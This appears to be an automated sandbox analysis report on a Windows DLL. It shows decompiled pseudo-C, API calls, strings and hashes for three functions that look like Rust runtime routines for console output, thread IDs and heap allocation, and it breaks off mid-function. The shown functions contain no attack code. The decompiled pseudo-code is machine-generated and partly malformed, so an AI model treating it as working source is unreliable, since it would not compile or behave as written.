Instruction ID: bb8e4dc67f051b6cc2eecdde665e1ac3ad6843c711b219b1d7414d995b0d643a
Opcode Fuzzy Hash: 4a5ec8738aaf4831b10f7eb8dd41713b78ab8ba6797181c32c67b3585abf6e79
Instruction Fuzzy Hash: BB418131244349AFEB516EE49C19FAB3754EF22740F089220FE245D111E762DED29F9B

Uniqueness

Uniqueness Score: -1.00%

Function 6EA91BF0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212
fileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E6EA91BF0(void* __ebx, struct _OVERLAPPED** __ecx, void* __edx, void* __edi, void* __ebp, signed char _a4, signed char* _a8) {
				char _v20;
				void* _v24;
				char _v44;
				long _v48;
				void* _v52;
				signed int _v56;
				char _v60;
				void* __esi;
				long _t57;
				void* _t58;
				long _t60;
				signed int _t61;
				long _t81;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				char _t93;
				void* _t96;
				void* _t97;
				signed int _t100;
				signed int _t101;
				struct _OVERLAPPED* _t102;
				signed int _t105;
				signed int* _t106;
				signed int _t110;
				signed char _t112;
				void* _t114;
				long _t118;
				void** _t119;
				void* _t120;
				long _t122;
				void* _t125;
				void* _t133;
				struct _OVERLAPPED** _t135;
				void* _t144;
				long _t152;
				signed char* _t155;
				DWORD* _t156;
				void* _t157;
				void** _t158;
				void** _t160;

				_push(__ebp);
				_push(__ebx);
				_push(__edi);
				_t158 = _t157 - 0x30;
				_t152 = _a4;
				_t135 = __ecx;
				if(_t152 == 0) {
					 *(__ecx + 4) = 0;
					goto L5;
				} else {
					_t96 = __edx;
					_t58 = GetStdHandle(0xfffffff4);
					if(_t58 == 0) {
						_t57 = 6;
						goto L7;
					} else {
						_t133 = _t58;
						if(_t58 != 0xffffffff) {
							_v48 = 0;
							_t60 = GetConsoleMode(_t133,  &_v48);
							__eflags = _t60;
							if(_t60 == 0) {
								__eflags = _t133;
								if(__eflags == 0) {
									goto L42;
								} else {
									_v48 = 0;
									_t81 = WriteFile(_t133, _t96, _t152,  &_v48, 0);
									__eflags = _t81;
									if(_t81 == 0) {
										_t57 = GetLastError();
										_t102 = 0;
										__eflags = 0;
										_t122 = 1;
									} else {
										_t102 = _v48;
										_t57 = 0;
										_t122 = 0;
									}
									 *_t135 = _t122;
									_t135[1] = _t102;
									_t135[2] = _t57;
									goto L9;
								}
							} else {
								_t57 = _a8[4] & 0x000000ff;
								__eflags = _t57;
								if(_t57 == 0) {
									__eflags = _t152 - 0x1000;
									_t84 =  <  ? _t152 : 0x1000;
									_push( <  ? _t152 : 0x1000);
									E6EA83650( &_v60, _t96);
									_t158 =  &(_t158[1]);
									__eflags = _v60 - 1;
									if(_v60 != 1) {
										_t86 = _v56;
										_t97 = _v52;
										goto L28;
									} else {
										__eflags = _v56;
										if(_v56 == 0) {
											_t87 =  *_t96 & 0x000000ff;
											_t38 = _t87 + 0x6eacf570; // 0x1010101
											_t105 =  *_t38 & 0x000000ff;
											__eflags = _t105 - 2;
											if(_t105 < 2) {
												L39:
												_t135[2] = 0x6ead08cc;
												_t135[1] = 0x1502;
												goto L40;
											} else {
												__eflags = _t105 - _t152;
												if(_t105 <= _t152) {
													goto L39;
												} else {
													_t106 = _a8;
													 *_t106 = _t87;
													_t106[1] = 1;
													goto L38;
												}
											}
											goto L9;
										} else {
											_t88 = _v56;
											__eflags = _t88 - _t152;
											if(__eflags > 0) {
												_t100 = _t88;
												_t118 = _t152;
												_push(0x6ead0904);
												goto L45;
											} else {
												_t125 = _t96;
												_push(_t88);
												E6EA83650( &_v48, _t125);
												_t158 =  &(_t158[1]);
												_t86 = L6EA92730(_t96,  &_v48, _t133, _t135);
												_t97 = _t125;
												L28:
												_push(_t97);
												_push(_t86);
												_t57 = L6EA92470(_t97, _t135, _t133, _t133, _t135);
												_t158 =  &(_t158[2]);
												goto L9;
											}
										}
									}
								} else {
									__eflags = _t57 - 4;
									if(_t57 >= 4) {
										E6EAA99A0("Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx", 0x3a, 0x6ead086c);
										_t158 =  &(_t158[1]);
										asm("ud2");
										L42:
										_t61 = E6EAA94E0(_t96,  &M6EACFBBA, 0x23, _t133, _t135, __eflags, 0x6eacfc64);
										_t158 =  &(_t158[1]);
										asm("ud2");
										goto L43;
									} else {
										_t110 =  *_t96;
										_t155 = _a8;
										__eflags = (_t110 & 0x000000c0) - 0x80;
										if((_t110 & 0x000000c0) != 0x80) {
											_a4 = 0;
											goto L24;
										} else {
											_t155[_t57] = _t110;
											_t112 = _a4 + 1;
											_a4 = _t112;
											_t57 =  *_t155 & 0x000000ff;
											_t96 =  *(_t57 + 0x6eacf570) & 0x000000ff;
											__eflags = _t96 - _t112;
											_v24 = _t96;
											if(_t96 <= _t112) {
												_t61 = _t112 & 0x000000ff;
												__eflags = _t112 - 5;
												if(__eflags >= 0) {
													L43:
													_t100 = _t61;
													_t118 = 4;
													_push(0x6ead08d4);
													L45:
													E6EAA9470(_t96, _t100, _t118, _t133, _t135, __eflags);
													_t160 =  &(_t158[1]);
													asm("ud2");
													goto L46;
												} else {
													_push(_t61);
													_t57 = E6EA83650( &_v60, _t155);
													_t158 =  &(_t158[1]);
													__eflags = _v60 - 1;
													_a4 = 0;
													if(_v60 == 1) {
														L24:
														_t135[2] = 0x6ead08cc;
														_t135[1] = 0x1502;
														goto L8;
													} else {
														_t114 = _v52;
														_t91 = _v56;
														__eflags = _t114 - _t96;
														 *_t158 = _t114;
														if(_t114 != _t96) {
															L46:
															_t101 =  &_v24;
															_t119 = _t160;
															_v48 = 0;
															_push(0x6ead08e4);
															_push( &_v48);
															goto L48;
														} else {
															_t156 =  &_v48;
															_push(_t96);
															_push(_t91);
															L6EA92470(_t96, _t156, _t133, _t133, _t135);
															_t160 =  &(_t158[2]);
															__eflags = _v48 - 1;
															if(_v48 != 1) {
																_t93 = _v44;
																 *_t160 = _t96;
																__eflags = _t93 - _t96;
																_v20 = _t93;
																if(_t93 != _t96) {
																	_t101 =  &_v20;
																	_t119 = _t160;
																	_v48 = 0;
																	_push(0x6ead08f4);
																	_push(_t156);
																	L48:
																	E6EAA9AB0(_t96, _t101, _t119, _t133);
																	asm("ud2");
																	L50();
																	_t120 = _t135;
																	__eflags = _t101 - 0x46a;
																	if(_t101 > 0x46a) {
																		__eflags = _t101 - 0x271c;
																		if(_t101 <= 0x271c) {
																			__eflags = _t101 - 0x1715;
																			if(_t101 > 0x1715) {
																				__eflags = _t101 - 0x1f4d;
																				if(_t101 > 0x1f4d) {
																					__eflags = _t101 - 0x1f4e;
																					if(_t101 == 0x1f4e) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x2022;
																						if(_t101 == 0x2022) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x25e9;
																							if(_t101 != 0x25e9) {
																								goto L106;
																							} else {
																								goto L93;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x1716;
																					if(_t101 == 0x1716) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x1b64;
																						if(_t101 == 0x1b64) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x1b80;
																							if(_t101 == 0x1b80) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x4cf;
																				if(_t101 > 0x4cf) {
																					__eflags = _t101 - 0x4d0;
																					if(_t101 == 0x4d0) {
																						return 4;
																					} else {
																						__eflags = _t101 - 0x50f;
																						if(_t101 == 0x50f) {
																							return 0x1a;
																						} else {
																							__eflags = _t101 - 0x5b4;
																							if(_t101 == 0x5b4) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x46b;
																					if(_t101 == 0x46b) {
																						return 0x1e;
																					} else {
																						__eflags = _t101 - 0x476;
																						if(_t101 == 0x476) {
																							return 0x20;
																						} else {
																							__eflags = _t101 - 0x4cf;
																							if(_t101 != 0x4cf) {
																								goto L106;
																							} else {
																								return 5;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t144 = _t101 - 0x271d;
																			__eflags = _t144 - 0x34;
																			if(_t144 <= 0x34) {
																				goto __edx;
																			}
																			__eflags = _t101 - 0x3c2a - 2;
																			if(_t101 - 0x3c2a < 2) {
																				goto L93;
																			} else {
																				__eflags = _t101 - 0x35ed;
																				if(_t101 == 0x35ed) {
																					goto L93;
																				} else {
																					goto L106;
																				}
																			}
																		}
																	} else {
																		__eflags = _t101 - 0xb6;
																		if(_t101 > 0xb6) {
																			__eflags = _t101 - 0x10a;
																			if(_t101 <= 0x10a) {
																				__eflags = _t101 - 0xde;
																				if(_t101 <= 0xde) {
																					__eflags = _t101 - 0xb7;
																					if(_t101 == 0xb7) {
																						return 0xc;
																					} else {
																						__eflags = _t101 - 0xce;
																						if(_t101 != 0xce) {
																							goto L106;
																						} else {
																							return 0x21;
																						}
																					}
																				} else {
																					__eflags = _t101 - 0xdf;
																					if(_t101 == 0xdf) {
																						return 0x1b;
																					} else {
																						__eflags = _t101 - 0xe8;
																						if(_t101 == 0xe8) {
																							return 0xb;
																						} else {
																							__eflags = _t101 - 0x102;
																							if(_t101 == 0x102) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x3e2;
																				if(_t101 > 0x3e2) {
																					__eflags = _t101 - 0x3e3;
																					if(_t101 == 0x3e3) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x41d;
																						if(_t101 == 0x41d) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x461;
																							if(_t101 == 0x461) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x10b;
																					if(_t101 == 0x10b) {
																						return 0xe;
																					} else {
																						__eflags = _t101 - 0x150;
																						if(_t101 == 0x150) {
																							return 0xf;
																						} else {
																							__eflags = _t101 - 0x252;
																							if(_t101 == 0x252) {
																								L93:
																								return 0x16;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t101 = _t101 + 0xfffffffe;
																			__eflags = _t101 - 0xa8;
																			if(_t101 <= 0xa8) {
																				_t120 = _t120 +  *((intOrPtr*)(0x6ea920f8 + _t101 * 4));
																				goto __edx;
																			}
																			L106:
																			return 0x28;
																		}
																	}
																} else {
																	L38:
																	_t57 = 0;
																	_t135[1] = 1;
																	 *_t135 = 0;
																	goto L9;
																}
															} else {
																asm("movsd xmm0, [esp+0x14]");
																asm("movsd [esi+0x4], xmm0");
																L40:
																_t57 = 1;
																 *_t135 = 1;
																goto L9;
															}
														}
													}
												}
											} else {
												_t135[1] = 1;
												L5:
												 *_t135 = 0;
												goto L9;
											}
										}
									}
								}
							}
						} else {
							_t57 = GetLastError();
							L7:
							_t135[1] = 0;
							_t135[2] = _t57;
							L8:
							 *_t135 = 1;
							L9:
							return _t57;
						}
					}
				}
			}

0x6ea91bf0
0x6ea91bf1
0x6ea91bf2
0x6ea91bf4
0x6ea91bf7
0x6ea91bfb
0x6ea91bff
0x6ea91c1e
0x00000000
0x6ea91c01
0x6ea91c01
0x6ea91c05
0x6ea91c0d
0x6ea91c2d
0x00000000
0x6ea91c0f
0x6ea91c0f
0x6ea91c14
0x6ea91c4e
0x6ea91c58
0x6ea91c5e
0x6ea91c60
0x6ea91cb9
0x6ea91cbb
0x00000000
0x6ea91cc1
0x6ea91cc1
0x6ea91cd3
0x6ea91cd9
0x6ea91cdb
0x6ea91d55
0x6ea91d5b
0x6ea91d5b
0x6ea91d5d
0x6ea91cdd
0x6ea91cdd
0x6ea91ce1
0x6ea91ce3
0x6ea91ce3
0x6ea91d62
0x6ea91d64
0x6ea91d67
0x00000000
0x6ea91d67
0x6ea91c62
0x6ea91c66
0x6ea91c6a
0x6ea91c6c
0x6ea91ce7
0x6ea91cf8
0x6ea91cfb
0x6ea91cfc
0x6ea91d01
0x6ea91d04
0x6ea91d09
0x6ea91d6f
0x6ea91d73
0x00000000
0x6ea91d0b
0x6ea91d0b
0x6ea91d10
0x6ea91de9
0x6ea91dec
0x6ea91dec
0x6ea91df3
0x6ea91df6
0x6ea91e2b
0x6ea91e2b
0x6ea91e32
0x00000000
0x6ea91df8
0x6ea91df8
0x6ea91dfa
0x00000000
0x6ea91dfc
0x6ea91dfc
0x6ea91e00
0x6ea91e02
0x00000000
0x6ea91e02
0x6ea91dfa
0x00000000
0x6ea91d16
0x6ea91d16
0x6ea91d1a
0x6ea91d1c
0x6ea91e85
0x6ea91e87
0x6ea91e89
0x00000000
0x6ea91d22
0x6ea91d26
0x6ea91d2a
0x6ea91d2b
0x6ea91d30
0x6ea91d35
0x6ea91d3a
0x6ea91d77
0x6ea91d7b
0x6ea91d7c
0x6ea91d7d
0x6ea91d82
0x00000000
0x6ea91d82
0x6ea91d1c
0x6ea91d10
0x6ea91c6e
0x6ea91c6e
0x6ea91c70
0x6ea91e54
0x6ea91e59
0x6ea91e5c
0x6ea91e5e
0x6ea91e6d
0x6ea91e72
0x6ea91e75
0x00000000
0x6ea91c76
0x6ea91c76
0x6ea91c78
0x6ea91c81
0x6ea91c84
0x6ea91d3e
0x00000000
0x6ea91c8a
0x6ea91c8a
0x6ea91c91
0x6ea91c93
0x6ea91c96
0x6ea91c9a
0x6ea91ca1
0x6ea91ca3
0x6ea91ca7
0x6ea91d8a
0x6ea91d8d
0x6ea91d90
0x6ea91e77
0x6ea91e77
0x6ea91e79
0x6ea91e7e
0x6ea91e8e
0x6ea91e8e
0x6ea91e93
0x6ea91e96
0x00000000
0x6ea91d96
0x6ea91d9c
0x6ea91d9d
0x6ea91da2
0x6ea91da5
0x6ea91daa
0x6ea91dae
0x6ea91d42
0x6ea91d42
0x6ea91d49
0x00000000
0x6ea91db0
0x6ea91db0
0x6ea91db4
0x6ea91db8
0x6ea91dba
0x6ea91dbd
0x6ea91e98
0x6ea91e98
0x6ea91e9c
0x6ea91e9e
0x6ea91ea6
0x6ea91eaf
0x00000000
0x6ea91dc3
0x6ea91dc3
0x6ea91dcb
0x6ea91dcc
0x6ea91dcd
0x6ea91dd2
0x6ea91dd5
0x6ea91dda
0x6ea91e08
0x6ea91e0c
0x6ea91e0f
0x6ea91e11
0x6ea91e15
0x6ea91eb2
0x6ea91eb6
0x6ea91eb8
0x6ea91ec0
0x6ea91ec5
0x6ea91ec6
0x6ea91ec6
0x6ea91ece
0x6ea91ed1
0x6ea91ed6
0x6ea91ed9
0x6ea91edf
0x6ea91f05
0x6ea91f0b
0x6ea91f29
0x6ea91f2f
0x6ea91fa2
0x6ea91fa8
0x6ea9205e
0x6ea92064
0x00000000
0x6ea92066
0x6ea92066
0x6ea9206c
0x00000000
0x6ea9206e
0x6ea9206e
0x6ea92074
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea92074
0x6ea9206c
0x6ea91fae
0x6ea91fae
0x6ea91fb4
0x00000000
0x6ea91fba
0x6ea91fba
0x6ea91fc0
0x00000000
0x6ea91fc6
0x6ea91fc6
0x6ea91fcc
0x00000000
0x6ea91fd2
0x00000000
0x6ea91fd2
0x6ea91fcc
0x6ea91fc0
0x6ea91fb4
0x6ea91f31
0x6ea91f31
0x6ea91f37
0x6ea92020
0x6ea92026
0x6ea920a1
0x6ea92028
0x6ea92028
0x6ea9202e
0x6ea920f1
0x6ea92034
0x6ea92034
0x6ea9203a
0x00000000
0x6ea9203c
0x00000000
0x6ea9203c
0x6ea9203a
0x6ea9202e
0x6ea91f3d
0x6ea91f3d
0x6ea91f43
0x6ea920dd
0x6ea91f49
0x6ea91f49
0x6ea91f4f
0x6ea920e1
0x6ea91f55
0x6ea91f55
0x6ea91f5b
0x00000000
0x6ea91f61
0x6ea91f64
0x6ea91f64
0x6ea91f5b
0x6ea91f4f
0x6ea91f43
0x6ea91f37
0x6ea91f0d
0x6ea91f0d
0x6ea91f13
0x6ea91f16
0x6ea91f23
0x6ea91f23
0x6ea9200e
0x6ea92011
0x00000000
0x6ea92013
0x6ea92013
0x6ea92019
0x00000000
0x6ea9201b
0x00000000
0x6ea9201b
0x6ea92019
0x6ea92011
0x6ea91ee1
0x6ea91ee1
0x6ea91ee7
0x6ea91f65
0x6ea91f6b
0x6ea91fd7
0x6ea91fdd
0x6ea92082
0x6ea92088
0x6ea92099
0x6ea9208a
0x6ea9208a
0x6ea92090
0x00000000
0x6ea92092
0x6ea92095
0x6ea92095
0x6ea92090
0x6ea91fe3
0x6ea91fe3
0x6ea91fe9
0x6ea920ed
0x6ea91fef
0x6ea91fef
0x6ea91ff5
0x6ea9209d
0x6ea91ffb
0x6ea91ffb
0x6ea92001
0x00000000
0x6ea92003
0x00000000
0x6ea92003
0x6ea92001
0x6ea91ff5
0x6ea91fe9
0x6ea91f6d
0x6ea91f6d
0x6ea91f73
0x6ea92041
0x6ea92047
0x00000000
0x6ea92049
0x6ea92049
0x6ea9204f
0x00000000
0x6ea92051
0x6ea92051
0x6ea92057
0x00000000
0x6ea92059
0x00000000
0x6ea92059
0x6ea92057
0x6ea9204f
0x6ea91f79
0x6ea91f79
0x6ea91f7f
0x6ea920e5
0x6ea91f85
0x6ea91f85
0x6ea91f8b
0x6ea920e9
0x6ea91f91
0x6ea91f91
0x6ea91f97
0x6ea92076
0x6ea92079
0x6ea91f9d
0x00000000
0x6ea91f9d
0x6ea91f97
0x6ea91f8b
0x6ea91f7f
0x6ea91f73
0x6ea91ee9
0x6ea91ee9
0x6ea91eec
0x6ea91ef2
0x6ea91ef8
0x6ea91eff
0x6ea91eff
0x6ea920f2
0x6ea920f5
0x6ea920f5
0x6ea91ee7
0x6ea91e1b
0x6ea91e1b
0x6ea91e1b
0x6ea91e1d
0x6ea91e24
0x00000000
0x6ea91e24
0x6ea91ddc
0x6ea91ddc
0x6ea91de2
0x6ea91e39
0x6ea91e39
0x6ea91e3e
0x00000000
0x6ea91e3e
0x6ea91dda
0x6ea91dbd
0x6ea91dae
0x6ea91cad
0x6ea91cad
0x6ea91c25
0x6ea91c25
0x00000000
0x6ea91c25
0x6ea91ca7
0x6ea91c84
0x6ea91c70
0x6ea91c6c
0x6ea91c16
0x6ea91c16
0x6ea91c32
0x6ea91c32
0x6ea91c39
0x6ea91c3c
0x6ea91c3c
0x6ea91c42
0x6ea91c49
0x6ea91c49
0x6ea91c14
0x6ea91c0d

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6EA91A7E,?), ref: 6EA91C05
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6EA91A7E,?), ref: 6EA91C16
GetConsoleMode.KERNEL32(00000000,?), ref: 6EA91C58
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6EA91CD3
GetLastError.KERNEL32(?,?,?,00000000), ref: 6EA91D55

Strings

assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb, xrefs: 6EA91E5E
Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx, xrefs: 6EA91E45

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$ConsoleFileHandleModeWrite
String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx$assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb
API String ID: 4172320683-1866377508
Opcode ID: 0e3a2f0728063f1279d062cd792d0343d76788ad021e2363af690ff2de3157e3
Instruction ID: 1929ec23e3279e0261045a500d173ab299cfd345ef140e1ffd5750efd4a1a9bb
Opcode Fuzzy Hash: 0e3a2f0728063f1279d062cd792d0343d76788ad021e2363af690ff2de3157e3
Instruction Fuzzy Hash: 9171E2706183058FD7108FA9D49077B7BE9ABA6308F15882DE4DA8B380E735D8CDD71A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C4D0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6EA8C4D0(void* __ebx, void* __edi, void* __esi, void* _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				long _v48;
				void* __ebp;
				void* _t22;
				void* _t29;
				void* _t30;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				void* _t54;

				_t32 = __ebx;
				_v32 = _t54 - 0x20;
				_v20 = 0xffffffff;
				_v24 = E6EA93990;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_v48 = 0;
				__imp__AcquireSRWLockExclusive(0x6eade108, __esi, __edi, __ebx);
				_t47 =  *0x6eadd038; // 0x1
				_t50 =  *0x6eadd03c; // 0x0
				_v40 = 0x6eade108;
				_t43 = _t47 & _t50;
				if(_t43 == 0xffffffff) {
					L8:
					_v36 = _t43;
					__imp__ReleaseSRWLockExclusive(0x6eade108);
					_v20 = 0;
					_t22 = E6EAA99A0("failed to generate unique thread ID: bitspace exhausted", 0x37, 0x6eacfa80);
					goto L10;
				} else {
					 *0x6eadd038 = _t47 + 1;
					asm("adc ecx, 0x0");
					 *0x6eadd03c = _t50;
					if((_t47 | _t50) == 0) {
						_v36 = _t43;
						_v20 = 0;
						_t22 = E6EAA94E0(__ebx, "called `Option::unwrap()` on a `None` value", 0x2b, _t47, _t50, __eflags, 0x6eacfa90);
						L10:
						asm("ud2");
						__eflags = _v36 - 0xffffffff;
						if(_v36 != 0xffffffff) {
							E6EA8C6B0(_t22,  &_v40);
						}
						return E6EA8C690( &_v48);
					} else {
						__imp__ReleaseSRWLockExclusive(0x6eade108);
						_t29 =  *0x6eade128; // 0x2d40000
						if(_t29 != 0) {
							L5:
							_t30 = HeapAlloc(_t29, 0, 0x20);
							if(_t30 == 0) {
								goto L7;
							} else {
								 *(_t30 + 8) = _t47;
								 *(_t30 + 0xc) = _t50;
								 *(_t30 + 0x10) = 0;
								 *((char*)(_t30 + 0x18)) = 0;
								 *_t30 = 1;
								 *(_t30 + 4) = 1;
								 *[fs:0x0] = _v28;
								return _t30;
							}
						} else {
							_t29 = GetProcessHeap();
							if(_t29 == 0) {
								L7:
								_t43 = 8;
								E6EAA92F0(_t32, 0x20, 8, _t47, _t50, __eflags);
								asm("ud2");
								goto L8;
							} else {
								 *0x6eade128 = _t29;
								goto L5;
							}
						}
					}
				}
			}

0x6ea8c4d0
0x6ea8c4d9
0x6ea8c4dc
0x6ea8c4e3
0x6ea8c4f4
0x6ea8c4f7
0x6ea8c4fd
0x6ea8c509
0x6ea8c50f
0x6ea8c515
0x6ea8c51b
0x6ea8c524
0x6ea8c529
0x6ea8c5bf
0x6ea8c5bf
0x6ea8c5c7
0x6ea8c5cd
0x6ea8c5e3
0x00000000
0x6ea8c52f
0x6ea8c536
0x6ea8c53d
0x6ea8c542
0x6ea8c548
0x6ea8c5ed
0x6ea8c5f0
0x6ea8c606
0x6ea8c60e
0x6ea8c60e
0x6ea8c617
0x6ea8c61b
0x6ea8c620
0x6ea8c620
0x6ea8c631
0x6ea8c54e
0x6ea8c553
0x6ea8c559
0x6ea8c560
0x6ea8c570
0x6ea8c575
0x6ea8c57c
0x00000000
0x6ea8c57e
0x6ea8c57e
0x6ea8c581
0x6ea8c584
0x6ea8c58b
0x6ea8c58f
0x6ea8c595
0x6ea8c59f
0x6ea8c5ad
0x6ea8c5ad
0x6ea8c562
0x6ea8c562
0x6ea8c569
0x6ea8c5ae
0x6ea8c5b3
0x6ea8c5b8
0x6ea8c5bd
0x00000000
0x6ea8c56b
0x6ea8c56b
0x00000000
0x6ea8c56b
0x6ea8c569
0x6ea8c560
0x6ea8c548

APIs

AcquireSRWLockExclusive.KERNEL32(6EADE108), ref: 6EA8C509
ReleaseSRWLockExclusive.KERNEL32(6EADE108), ref: 6EA8C553
GetProcessHeap.KERNEL32 ref: 6EA8C562
HeapAlloc.KERNEL32(02D40000,00000000,00000020), ref: 6EA8C575
ReleaseSRWLockExclusive.KERNEL32(6EADE108), ref: 6EA8C5C7

Strings

failed to generate unique thread ID: bitspace exhausted, xrefs: 6EA8C5D4
called `Option::unwrap()` on a `None` value, xrefs: 6EA8C5F7

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
API String ID: 1780889587-1657987152
Opcode ID: 246633844eb38b9a31a3890a367feb9a804cf3456ef2b8be1151b2059ee2ac6b
Instruction ID: 8dcdd8420a566dd6490574176da4fad63ed5b3d05ed0873dbe38fbad6bde14ab
Opcode Fuzzy Hash: 246633844eb38b9a31a3890a367feb9a804cf3456ef2b8be1151b2059ee2ac6b
Instruction Fuzzy Hash: 7D31CDB0E003048BEB048FD8D91879EBBB4FB88324F148229D4156F380D7359989CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA810A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6EA810A0(long __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, char _a8, intOrPtr _a16) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				long _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				void* __ebp;
				void* _t45;
				void* _t46;
				void* _t50;
				void* _t51;
				intOrPtr _t54;
				long _t62;
				void* _t71;
				void* _t81;
				void* _t84;
				intOrPtr _t85;

				_t78 = __esi;
				_t76 = __edi;
				_t59 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t85 = _t84 - 0x30;
				_v32 = _t85;
				_v20 = 0xffffffff;
				_v24 = E6EA93950;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t45 =  *0x6eade128; // 0x2d40000
				if(_t45 != 0) {
					L3:
					_t46 = HeapAlloc(_t45, 0, 0xf);
					if(_t46 == 0) {
						goto L18;
					} else {
						asm("movsd xmm0, [0x6eacda37]");
						asm("movsd xmm1, [0x6eacda30]");
						_v40 = _t46;
						asm("movsd [eax+0x7], xmm0");
						asm("movsd [eax], xmm1");
						_t50 =  *0x6eade128; // 0x2d40000
						if(_t50 != 0) {
							L7:
							_t51 = HeapAlloc(_t50, 0, 0x10);
							if(_t51 == 0) {
								goto L19;
							} else {
								asm("movsd xmm0, [0x6eacda47]");
								asm("movsd xmm1, [0x6eacda3f]");
								_t71 = 0;
								_t59 = 0x10;
								_v52 = _t51;
								_v48 = 0x10;
								asm("movsd [eax+0x8], xmm0");
								asm("movsd [eax], xmm1");
								while(1) {
									_v44 = _t59;
									if(_t71 > 0xf) {
										break;
									}
									_t17 = _t71 + 1; // 0x1
									_t76 = _t71 + _t17;
									_t78 = _t59 - _t76;
									if(_t78 < 0) {
										_v20 = 0;
										E6EAA9300(_t59, _t76, _t59, _t76, _t78, __eflags);
										asm("ud2");
										goto L18;
									} else {
										if(_t59 == _v48) {
											_v36 = _t71;
											_v56 = _t78;
											_v60 = _t76;
											_v20 = 0;
											_v64 = _t59;
											E6EAA9280( &_v52, _t59);
											_t51 = _v52;
											_t59 = _v64;
											_t71 = _v36;
											_t76 = _v60;
											_t78 = _v56;
										}
										_t10 = _t76 + 1; // 0x1
										_v36 = _t71 + 1;
										_t81 = _t51;
										E6EA9D4D0(_t51 + _t10, _t51 + _t76, _t78);
										_t71 = _v36;
										_t51 = _t81;
										_t85 = _t85 + 0xc;
										 *((char*)(_t81 + _t76)) = 0;
										_t59 = _t59 + 1;
										continue;
									}
									goto L21;
								}
								_v20 = 0;
								_v36 = _t51;
								E6EA9BE30(_v40, _a4, _a8, _t51, _a16);
								__eflags = _v48;
								if(_v48 != 0) {
									HeapFree( *0x6eade128, 0, _v36);
								}
								HeapFree( *0x6eade128, 0, _v40);
								_t54 = _v28;
